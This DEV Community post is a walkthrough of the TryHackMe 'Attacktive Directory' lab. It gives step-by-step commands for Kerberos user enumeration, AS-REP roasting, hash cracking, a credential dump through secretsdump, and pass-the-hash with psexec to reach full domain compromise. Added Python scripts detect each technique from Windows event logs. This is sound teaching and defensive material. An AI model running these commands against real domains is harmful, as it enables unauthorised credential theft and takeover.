DEV Community

zerogru

Master Active Directory: Attacktive Directory (TryHackMe) Walkthrough

Attacktive Directory Walkthrough (TryHackMe)

Active Directory Enumeration → Kerberos Abuse → Domain Compromise

About This Walkthrough

This guide documents the full exploitation path for the Attacktive Directory machine on TryHackMe.

The objective is to walk through a realistic Active Directory attack chain, covering the core pillars of a Windows domain engagement:

Enumeration

Kerberos exploitation

Credential harvesting

Lateral movement and full domain compromise

This is a hands-on, attacker-side perspective, designed for learners who already understand basic networking and Linux tooling.

Learning Objectives

By the end of this walkthrough, you will understand how to:

AD Enumeration
Map domain services, users, and attack surface.

Kerberos Exploitation
Abuse misconfigurations using ASREPRoasting.

Credential Harvesting
Crack Kerberos hashes using Hashcat.

Domain Takeover
Dump NTDS.dit and perform Pass-the-Hash attacks.

Tooling Requirements

Ensure the following tools are installed before starting:

Impacket
A powerful collection of scripts for interacting with Windows protocols.

Kerbrute
Used for Kerberos-based username enumeration.

Enum4linux
Useful for SMB and NetBIOS discovery.

Hashcat
Industry-standard password cracking tool.

Step-by-Step Walkthrough
1. Enumeration (DNS & Ports)

First, map the target IP address to the domain name:

echo "10.10.194.183 spookysec.local" | sudo tee -a /etc/hosts


Next, run a targeted scan against Active Directory–related ports:

nmap -p53,88,135,139,389,445,636,3268 -A -T4 spookysec.local


This confirms:

Domain Controller presence

Kerberos (88)

LDAP (389/636)

SMB (445)

2. Finding Valid Users (Kerberos Enumeration)

Kerberos reveals whether a username exists before any password is sent: the KDC answers an unknown name with a "principal unknown" error and a known name with a request for pre-authentication, so usernames can be validated without triggering account lockouts.

Using Kerbrute, enumerate valid domain users:

kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt


Any valid usernames discovered here become prime candidates for Kerberos attacks.

3. ASREPRoasting (Initial Access)

If a user account has “Do not require Kerberos pre-authentication” enabled, you can request a Ticket Granting Ticket (TGT) without credentials.

Use Impacket’s GetNPUsers.py:

python3 GetNPUsers.py spookysec.local/svc-admin -no-pass -usersfile userlist.txt


For each such account this returns the AS-REP (in hashcat's $krb5asrep$23$ format), which can be cracked offline.
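Both the username enumeration in step 2 and the AS-REP request in step 3 leave a trace on the domain controller: every AS-REQ is audited as Security Event ID 4768, with a result code, a pre-authentication type and a ticket encryption type. The following detection script is an added example and is not part of the original walkthrough or of any tool it mentions. It flags bursts of "principal unknown" failures from one address (the footprint of a wordlist-driven userenum), flags TGTs issued with no pre-authentication and an RC4 ticket (the request GetNPUsers.py makes), and audits userAccountControl values for the "Do not require Kerberos pre-authentication" bit. All sample events and account values are constructed, the field names are the script's own simplification of the event fields, and the threshold and window are assumptions to tune per environment.

```python
"""Detection and audit logic for Kerberos user enumeration and AS-REP roasting.

Added example, not part of the original walkthrough. It works on records
shaped like Windows Security Event ID 4768 (Kerberos authentication ticket
requested) and on userAccountControl values from a directory export. All
sample data below is constructed; field names are this script's own
simplification of the event's fields.
"""
from collections import defaultdict
from datetime import datetime, timedelta

DONT_REQ_PREAUTH = 0x400000          # userAccountControl bit ADS_UF_DONT_REQUIRE_PREAUTH
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"  # 4768 result code: requested user does not exist
RC4_HMAC = "0x17"                    # ticket encryption type 23, the one hashcat 18200 cracks


def _ev(t, user, ip, status, preauth, etype):
    """Build one constructed 4768 record with the fields the rules below use."""
    return {"time": datetime.fromisoformat(t), "user": user, "ip": ip,
            "status": status, "preauth": preauth, "etype": etype}


_base = datetime(2024, 1, 1, 10, 0, 0)
SAMPLE_4768 = (
    # 12 unknown-principal failures in 22 s from one address: a wordlist being
    # replayed against the KDC, which is what a userenum run looks like
    [_ev((_base + timedelta(seconds=2 * i)).isoformat(), f"guess{i}", "10.10.14.5",
         KDC_ERR_C_PRINCIPAL_UNKNOWN, "-", "0xffffffff") for i in range(12)]
    + [
        # a single typo from a workstation: stays below the threshold
        _ev("2024-01-01T10:05:00", "jsmth", "10.10.20.7",
            KDC_ERR_C_PRINCIPAL_UNKNOWN, "-", "0xffffffff"),
        # ordinary logon: pre-auth type 2 (encrypted timestamp), AES256 ticket
        _ev("2024-01-01T10:06:00", "jsmith", "10.10.20.7", "0x0", "2", "0x12"),
        # roastable request: success with no pre-authentication and an RC4 ticket
        _ev("2024-01-01T10:07:00", "svc-admin", "10.10.14.5", "0x0", "0", RC4_HMAC),
    ]
)

# Constructed userAccountControl values as an LDAP export would return them.
# 512 = NORMAL_ACCOUNT; 66048 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD (0x10000).
SAMPLE_ACCOUNTS = {"jsmith": 512, "svc-admin": 512 | DONT_REQ_PREAUTH, "backup": 66048}


def detect_enumeration(events, threshold=10, window=timedelta(seconds=60)):
    """Return {client_ip: total_failures} for every address that produced at
    least `threshold` unknown-principal failures inside any `window`-long span."""
    by_ip = defaultdict(list)
    for e in events:
        if e["status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            by_ip[e["ip"]].append(e["time"])
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged


def detect_asrep_requests(events):
    """Usernames that were issued a TGT with no pre-authentication (type 0) and an
    RC4 ticket: the request GetNPUsers.py makes, meaning a crackable hash left the DC."""
    return sorted({e["user"] for e in events
                   if e["status"] == "0x0" and e["preauth"] == "0" and e["etype"] == RC4_HMAC})


def accounts_without_preauth(accounts):
    """Accounts whose userAccountControl has DONT_REQ_PREAUTH set. Clearing that bit
    removes the roasting path; where it must stay, a long random password is the fallback."""
    return sorted(name for name, uac in accounts.items() if uac & DONT_REQ_PREAUTH)


if __name__ == "__main__":
    print("enumeration sources:", detect_enumeration(SAMPLE_4768))
    print("AS-REP requests:", detect_asrep_requests(SAMPLE_4768))
    print("pre-auth disabled:", accounts_without_preauth(SAMPLE_ACCOUNTS))
```

The enumeration rule keys on the result code only, so it also catches tools that vary the client principal per request; the AS-REP rule keys on the combination of pre-auth type 0 and etype 0x17, because a legitimate AES-only logon never produces that pair. Both rules need "Audit Kerberos Authentication Service" enabled on the domain controllers, or 4768 is never written.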

4. Cracking Kerberos Hashes

Use Hashcat to crack the AS-REP hash.

Hash mode: 18200 (Kerberos 5 AS-REP)

hashcat -m 18200 hash.txt wordlist.txt


Once cracked, you gain plaintext credentials for a domain account.

5. Privilege Escalation & Domain Admin

With valid credentials for an account that holds replication rights on the domain (here, backup), dump secrets directly from the Domain Controller; -just-dc pulls the data through the directory replication service rather than by reading the NTDS.dit file, so local admin on the DC is not required:

python3 secretsdump.py -just-dc backup@spookysec.local


This extracts:

NTLM hashes

Domain Administrator credentials

Full Active Directory credential database (NTDS.dit)
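Because -just-dc uses the directory replication service, the domain controller records the request as Security Event ID 4662 on the domain object, with the replication control-access rights listed in the event's Properties field. The following script is an added example and is not part of the original walkthrough; it parses those records and alerts when any account that is not a known domain controller (or another allow-listed replicator) asks for a replication stream. The event records are constructed and the field names are the script's own simplification; the GUIDs are the real schema and control-access identifiers that appear in the event.

```python
"""Detect DCSync-style directory replication requests in Windows Security event 4662.

Added example, not part of the original walkthrough. secretsdump.py -just-dc pulls
account secrets through the directory replication service (DRSUAPI), which a DC
audits as event 4662 on the domain object carrying the replication control-access
rights. Sample records are constructed; the field names follow the 4662 fields
loosely and are this script's own.
"""
import re

# Control-access right GUIDs as they appear in the 4662 "Properties" field
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {
    DS_REPLICATION_GET_CHANGES: "DS-Replication-Get-Changes",
    DS_REPLICATION_GET_CHANGES_ALL: "DS-Replication-Get-Changes-All",
}
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"  # schema GUID of the domainDNS class
USER_CLASS = "bf967aba-0de6-11d0-a285-00aa003049e2"        # schema GUID of the user class
CONTROL_ACCESS = 0x100                                      # ADS_RIGHT_DS_CONTROL_ACCESS
_GUID = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Constructed 4662 records: subject account, object type, access mask and the
# multi-line Properties text exactly as the event renders it
SAMPLE_4662 = [
    # the second DC replicating normally: expected, must not alert
    {"subject": "DC02$", "object_type": "{" + DOMAIN_DNS_CLASS + "}", "access_mask": "0x100",
     "properties": "Control Access\n\t{" + DS_REPLICATION_GET_CHANGES + "}\n\t{"
                   + DS_REPLICATION_GET_CHANGES_ALL + "}\n"},
    # a user account asking the DC for a full replication stream: the -just-dc footprint
    {"subject": "backup", "object_type": "{" + DOMAIN_DNS_CLASS + "}", "access_mask": "0x100",
     "properties": "Control Access\n\t{" + DS_REPLICATION_GET_CHANGES + "}\n\t{"
                   + DS_REPLICATION_GET_CHANGES_ALL + "}\n"},
    # routine property read on a user object (Personal-Information property set): no replication right
    {"subject": "jsmith", "object_type": "{" + USER_CLASS + "}", "access_mask": "0x10",
     "properties": "Read Property\n\t{77b5b886-944a-11d1-aebd-0000f80367c1}\n"},
]


def _guids(text):
    """Lower-cased GUIDs found in a Properties or Object Type field."""
    return {g.lower() for g in _GUID.findall(text)}


def replication_rights(event):
    """Names of the replication rights one 4662 record requests on the domain
    object, or [] if the record is not a control-access operation on domainDNS."""
    if not int(event["access_mask"], 16) & CONTROL_ACCESS:
        return []
    if DOMAIN_DNS_CLASS not in _guids(event["object_type"]):
        return []
    return sorted(REPLICATION_RIGHTS[g] for g in _guids(event["properties"])
                  if g in REPLICATION_RIGHTS)


def detect_dcsync(events, expected_replicators):
    """Alerts for replication requests from accounts that are not known domain
    controllers or other allow-listed replicators (e.g. a directory sync account)."""
    allowed = {a.upper() for a in expected_replicators}
    alerts = []
    for e in events:
        rights = replication_rights(e)
        if rights and e["subject"].upper() not in allowed:
            alerts.append({"account": e["subject"], "rights": rights})
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_4662, expected_replicators={"DC02$"}):
        print("replication request from non-DC account:", alert)
```

The allow-list should be built from the domain's actual DC computer accounts and any sync service accounts rather than hard-coded; the check that matters on this box is the one the rule makes visible: a plain user account (backup) holding DS-Replication-Get-Changes-All is the misconfiguration that turns one cracked password into the whole NTDS.dit, and an ACL review of the domain object finds it before an attacker does.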

6. Pass-the-Hash (Domain Compromise)

Using the Administrator NTLM hash, authenticate without knowing the password. The -hashes argument takes LM:NT; the LM half is left empty, hence the leading colon:

python3 psexec.py Administrator@spookysec.local -hashes :<ADMINISTRATOR_NT_HASH>

Replace <ADMINISTRATOR_NT_HASH> with the NT hash of the Administrator account from the secretsdump output.


You now have:

SYSTEM shell

Full Domain Admin access

Complete domain compromise
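A pass-the-hash psexec session is loud on the target: the domain controller logs a network logon (Security Event ID 4624, logon type 3) for Administrator with NTLM as the authentication package, and psexec-style tools then create a service to run their payload, which the System log records as Event ID 7045. The script below is an added example and is not part of the original walkthrough; it correlates NTLM network logons of privileged accounts with a service install on the same host within a short window. Sample records are constructed (including the random-looking service and executable names), the field names are the script's simplification of the two events, and the watchlist and window are assumptions.

```python
"""Correlate NTLM network logons of privileged accounts with new service installs,
the host-side footprint of a pass-the-hash psexec session.

Added example, not from the original walkthrough. It consumes records shaped like
Security event 4624 (an account was successfully logged on) and System event 7045
(a service was installed). Samples are constructed; field names are this script's
simplification of the real event fields.
"""
from datetime import datetime, timedelta

PRIVILEGED = {"ADMINISTRATOR"}   # constructed watchlist; in practice fed from Domain Admins membership
NETWORK_LOGON = 3                # 4624 logon type for SMB/RPC sessions from a remote host


def _t(s):
    return datetime.fromisoformat(s)


SAMPLE_4624 = [
    # routine Kerberos network logon by a standard user
    {"time": _t("2024-01-01T11:00:00"), "host": "DC01", "user": "jsmith",
     "logon_type": 3, "auth_package": "Kerberos", "ip": "10.10.20.7"},
    # Administrator arriving over NTLM from an address that is not a managed workstation
    {"time": _t("2024-01-01T11:02:10"), "host": "DC01", "user": "Administrator",
     "logon_type": 3, "auth_package": "NTLM", "ip": "10.10.14.5"},
    # Administrator at the console (type 2) with Kerberos: privileged, but not NTLM over the network
    {"time": _t("2024-01-01T11:30:00"), "host": "DC01", "user": "Administrator",
     "logon_type": 2, "auth_package": "Kerberos", "ip": "-"},
]
SAMPLE_7045 = [
    # random-looking service and binary names two seconds after the NTLM logon (constructed)
    {"time": _t("2024-01-01T11:02:12"), "host": "DC01", "service": "vXqRk",
     "image": "%systemroot%\\KmPzd.exe", "account": "LocalSystem"},
    # an agent install hours earlier, unrelated to any privileged logon
    {"time": _t("2024-01-01T09:00:00"), "host": "DC01", "service": "Sysmon64",
     "image": "C:\\Windows\\Sysmon64.exe", "account": "LocalSystem"},
]


def ntlm_privileged_network_logons(logons):
    """4624 records where a watch-listed account authenticated over the network with NTLM.
    In a Kerberos domain this alone is worth a look: the hash was used, not the password."""
    return [l for l in logons
            if l["logon_type"] == NETWORK_LOGON
            and l["auth_package"].upper() == "NTLM"
            and l["user"].upper() in PRIVILEGED]


def correlate_service_installs(logons, services, window=timedelta(seconds=60)):
    """Pair each suspicious logon with 7045 events on the same host that follow it
    within `window`; each pair is one alert carrying both halves of the evidence."""
    alerts = []
    for logon in ntlm_privileged_network_logons(logons):
        for svc in services:
            delay = svc["time"] - logon["time"]
            if svc["host"] == logon["host"] and timedelta(0) <= delay <= window:
                alerts.append({"host": logon["host"], "user": logon["user"], "ip": logon["ip"],
                               "service": svc["service"], "image": svc["image"],
                               "delay_seconds": delay.total_seconds()})
    return alerts


if __name__ == "__main__":
    for alert in correlate_service_installs(SAMPLE_4624, SAMPLE_7045):
        print("possible pass-the-hash remote execution:", alert)
```

The correlation is deliberately narrow so that it stays quiet on a normal DC; the broader controls are the ones that remove the technique rather than detect it: membership of tier-0 accounts in the Protected Users group (which refuses NTLM for them), and restricting NTLM domain-wide once the remaining NTLM consumers are inventoried.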

Key Takeaways

Kerberos misconfigurations often provide silent initial access

Password cracking is still one of the weakest links in AD security

Service accounts are frequent escalation paths

NTLM hashes are often as powerful as plaintext passwords